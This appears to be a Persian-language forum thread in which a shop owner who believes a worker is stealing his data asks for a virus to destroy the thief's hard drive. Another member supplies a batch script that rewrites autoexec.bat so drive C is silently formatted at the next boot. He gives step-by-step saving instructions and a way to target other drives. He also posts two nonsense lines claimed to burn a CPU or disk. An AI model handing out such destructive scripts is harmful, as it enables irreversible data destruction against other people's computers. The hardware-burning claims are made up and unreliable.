PDA

نسخه کامل مشاهده نسخه کامل : درخواست ويروس

شهرام11
25-12-2006, 23:58
باسلام خدمت دوستان
دوستان اخيرا يك نفر به كامپيوتر من دستبرد ميزند وچون اطلاعات خيلي مهم در را بطه با پروگرام آي سي ها وفلش موبايلها را دارم ونيز نميتوانم كامپيوترم را قفل كنم چون تعداد 5 نفر در مغازه ام مشغول به كار هستند وهمگي از اطلاعات بايد استفاده كنند
ميخواستم ويروسي را به من معرفي كنيد كه زيپ شده باشد وعمدا به صورتي قرار دهم كه اين ويروس به كامپيوتر شخصي كه از كارگر من سو استفاده ميكند برسه و هاردش را سرو ساماني بدهد
آيا اين امكان وجود دارد كه همچنين ويروسي را به من بدهيد؟
اگر امكان دارد كمكم كنيد چون ديگر دارم كلافه ميشوم -سالها تجربه ام دارد در كامپيوتر يك مبتدي استفاده ميشود

MAXXX
26-12-2006, 00:48
سلام
راه داره ولی اگه میخوای ویروس رو رویه کامپیوتر خودت بزاری که بعد از دستبرد به کامپیوتر اون منتقل بشه این نیست آخه اون موقع کامپیوتر خودت هم ویروسی میشه ...البته یه راه هایی هست... اگه ممکنه راجبه شیوه دستبرداش یکم بیشتر توضیح بده مثلا چطور اطلا عاته شما رو میدزده (رویه سی دی رایت میکنه یا ...) شما میتونی رویه قسمت هایه مختلف کامپیوترت رمز بزاری که هر کسی نتونه دسترسی داشته باشه و رمز ها رو به هرکس بخوای بدی

شهرام11
27-12-2006, 23:19
دوست عزيز ممنون كه ميخواهي كمكم كني --من عرض كردم كه فايل زيپ شده باشه كه بعد از آنزيپ توسط طرف مقابل ويروس فعال بشه

MAXXX
28-12-2006, 04:43
ببین این به کارت میخوره :
@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
اینو تویه Notepad کپی کن وسپس با پسونده BAT سیو کن حالا اگه روش کلیک کنی درایو C کامپیوتر فرمت میشه....نمیخواد زیپش کنی چون تا وقتی روش کلیک نکردی کار نمیکنه ....در ضمن برایه فرمت درایو هایه دیگه هم کافیه جایه C تویه برنامه اسمه اون درایو رو بنویسی
اینم دوتایه دیگه که اولی CPU و دومی هارد رو میسوزونه ولی بگم که من تا حالا استفاده نکردم ( همون اولی رو بزار بابا گناه داره):
1-cpu_567hjkblaster

debug e30 o31-2

عملکردشون هم مثل اوله تویه نت پد بنویس بعد با پسوند BAT سیو کن مواضب باش دقیقا همین هارو بنویسی اگر هم دوست داری هر 3 تا رو بهش بده

archiver
28-12-2006, 10:20
وقتی ویندوز فعاله مگه میشه C رو فرمت کرد؟

MAXXX
30-12-2006, 05:42
وقتی ویندوز فعاله مگه میشه C رو فرمت کرد؟

اين كد ابتدا اطلاعات موجود در autoexe.bat رو پاك ميكنه و در مرحله ي بعد كد format /autotest c:/u رو جاي اون قرار ميده ,وقتی كه قرباني سيستمش رو ريست كنه بعد اين كد اجرا میشه و درایو c طوری فرمت میشه که اطلاعاتش عمرا برگرده

شهرام11
31-12-2006, 00:40
ممنون دوستان به چه برنامه هاي ذخيره كنم من نت پدم فرمت گفته شده را نداره

MAXXX
31-12-2006, 04:43
وقتی میخوای سیو کنی اسم فایل رو اینطوری بنویس m.batالبته جایه m هرچی خواستی بنویس

amirgooran
04-01-2007, 14:08
شايد بتوني توي اين سايت چيزي پيدا كني
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]